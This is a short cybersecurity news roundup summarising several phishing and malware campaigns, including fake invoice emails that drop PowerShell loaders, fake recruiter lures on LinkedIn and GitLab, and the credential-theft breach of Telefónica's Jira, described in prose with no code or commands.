Both campaigns involved the distribution of malicious emails purporting to be invoices, purchase orders, or quotation requests with attachments, which when opened triggers a PowerShell script fetching the trojanized image and executing a .NET-based loader to launch the payloads.
WordPress, Shopify, and other widely used platforms have been spoofed in malicious emails purporting to be account confirmation or subscription notices that lure targets into downloading AnyDesk, TeamViewer, and other remote access software, which would eventually enable system infiltration for malware deployment and data exfiltration.
Attacks part of the campaign involved the delivery of phishing emails purporting to be freight invoices from DHL Express, which included a ZIP archive with a JavaScript file that facilitated the execution of a PowerShell script communicating with the attacker-controlled command-and-control server, according to an analysis from Infoblox.
Threat actors impersonating recruiters on LinkedIn provide targeted software developers with project tests and code reviews that redirect to malicious GitLab repositories that facilitate the distribution of modular information-stealing malware compatible with Windows, macOS, and Linux systems, a report from SecurityScorecard showed.
Infiltration of Telefónica's Jira platform through infostealer theft of credentials belonging to over a dozen of the firm's employees was followed by the targeting of employees with admin privileges and the eventual exfiltration of a list with 24,000 Telefónica employee names and emails, 5,000 internal files, and half a million internal Jira issue summaries.